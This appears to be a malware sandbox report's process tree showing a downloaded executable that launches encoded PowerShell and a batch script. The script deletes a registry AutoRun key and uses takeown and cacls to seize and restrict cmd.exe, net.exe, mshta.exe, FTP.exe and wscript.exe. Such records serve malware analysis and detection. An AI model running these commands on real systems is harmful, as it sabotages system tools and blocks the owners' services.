"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5052 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5092 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4856 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:96

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5272 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:1896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4560 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3080 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:2452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3140 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:4424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5412 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=892 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5368 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:1064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:8
2⤵
PID:1348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5336 --field-trial-handle=1720,i,15101431607290005894,1740302005090716142,131072 /prefetch:1
2⤵
PID:4420

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4808

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2112

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3548

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1652

C:\Users\Admin\Downloads\a-Xgjsx.exe
"C:\Users\Admin\Downloads\a-Xgjsx.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat" "
2⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:2204

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
PID:412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4180

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4884

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:3820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3404

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3524

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:3500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:2552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:2068

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:1692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:5036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:4352

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:4872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3548

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:2976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:3756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4452

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
PID:3240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3244

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4148

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4488

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4988

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:3728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:2888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:4836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2960

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:4984

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2176

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:1148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:4460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4164

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:4184

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4316

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:3876

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
PID:2380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:2156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:2060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1476

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4868

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:2664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:604

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:3148

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:4444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:3792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:2072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:660

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1020

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:4816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2960

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:3748

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:4856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:2464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2760

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2768

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:1472

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1216

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:2300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:3556

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3768

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:4808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:3596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2632

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:3524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2720

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:4428

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:4916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:2432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:3396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:4484

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:4104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2532

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:5040

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1540

C:\Windows\SysWOW64\cmd.exe
